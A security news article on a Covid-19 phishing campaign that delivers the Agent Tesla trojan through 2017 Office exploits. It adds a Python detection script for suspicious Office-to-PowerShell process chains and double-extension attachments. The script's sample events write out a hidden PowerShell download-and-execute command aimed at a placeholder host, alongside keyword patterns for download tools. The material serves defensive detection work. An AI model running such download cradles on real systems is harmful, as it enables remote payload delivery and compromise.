Covid-19 phishing Attack Spreads Agent Tesla Malware


Agent Tesla malware exploits two high-impact Microsoft Office vulnerabilities disclosed in 2017. The latest Covid-19 phishing attack smuggles in Agent Tesla: the remote access trojan (RAT) is hidden inside attachments, such as ZIP and RAR archives, as executables with double file extensions.

Researchers outlined how three campaign variants deployed payloads to capture keystrokes, take screenshots, and dump browser passwords, then sent this data to an e-mail server. Stolen data could include financial credentials, screenshots, and email and social media credentials. This data can later be used for digital crimes, including financial crimes. Hackers can abuse stolen information like trade secrets, customer data, and client information for ransom or to sell trade secrets to a competitor.
Two of the three variants examined by researchers exploited a stack-based buffer overflow vulnerability in the Microsoft Equation Editor component of unpatched Microsoft Office 2016 and older (CVE-2017-11882).

Hidden inside attachments titled either COVID 19 NEW ORDER FACE MASKS.doc.rtf or COVID-19 Supplier Notice.zip, the payload performed code injection into the Windows process RegAsm.exe and relayed stolen data back to the command and control server. Another variant analyzed is associated with RTF files named COVID-19 SUSPECTED AFFECTED VESSEL.doc or COVID-19 measures for FAIRCHEM STEED, Voyage (219152).doc, which contain an OLE2Link object that exploits a remote code execution vulnerability affecting Microsoft Office 2016 and older (CVE-2017-8570).

The winword.exe process then executed an embedded .sct file containing code that launched PowerShell.exe, which downloaded and executed a payload from a remote server. Agent Tesla, which was also deployed in another recent phishing campaign, first emerged in 2014 and is written in Microsoft's .NET. Hackers can buy a subscription license from the official Agent Tesla website.
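A defender-side example, added here and not part of the original article or of any vendor's tooling: it flags process-creation events that match the chain described above (an Office process spawning PowerShell or RegAsm.exe, PowerShell carrying a download cradle, Equation Editor spawning any child) and checks attachment names for the double-extension trick. Field names, file paths and the sample events are constructed assumptions, not real telemetry.

```python
import re
from pathlib import PureWindowsPath

# Office apps that should not be launching script hosts or .NET utilities.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Children worth flagging under an Office parent (PowerShell and RegAsm.exe appear in the write-up).
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "regsvr32.exe", "regasm.exe"}
DOWNLOAD_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|bitsadmin", re.I)
DECOY_DOC_EXTS = {"doc", "docx", "rtf", "pdf", "xls", "xlsx"}

def _base(path):
    return PureWindowsPath(path).name.lower()

def flag_event(ev):
    """Return the reasons one process-creation event matches the chain above."""
    parent, image = _base(ev["parent"]), _base(ev["image"])
    reasons = []
    # EQNEDT32.EXE is the Equation Editor binary; it has no business spawning children.
    if parent == "eqnedt32.exe":
        reasons.append("Equation Editor spawned a child process (CVE-2017-11882 pattern)")
    elif parent in OFFICE_PARENTS and image in SUSPICIOUS_CHILDREN:
        reasons.append(f"{parent} spawned {image}")
    if image == "powershell.exe" and DOWNLOAD_CRADLE.search(ev.get("cmdline", "")):
        reasons.append("PowerShell download cradle in command line")
    return reasons

def is_double_extension(filename):
    """Heuristic: 'X.doc.rtf' style names where a document extension hides the real one."""
    parts = _base(filename).split(".")
    return len(parts) >= 3 and parts[-2] in DECOY_DOC_EXTS and parts[-1] != parts[-2]

def scan(events):
    """Map each flagged event's index to its reasons; benign events are omitted."""
    return {i: r for i, ev in enumerate(events) if (r := flag_event(ev))}

# Constructed sample events with Sysmon-style field names, not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
    print(is_double_extension("COVID 19 NEW ORDER FACE MASKS.doc.rtf"))
```

The parent/child rule catches the first two stages of the chain even when the downloaded payload changes; the attachment check is a mail-gateway heuristic and will also flag benign but oddly named files, so treat it as a triage signal.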

Users should avoid opening attachments and clicking on web links in unsolicited emails. Organizations can further reduce the risk with multi-factor authentication, employee awareness training, and keeping systems and software up to date with the latest patches applied.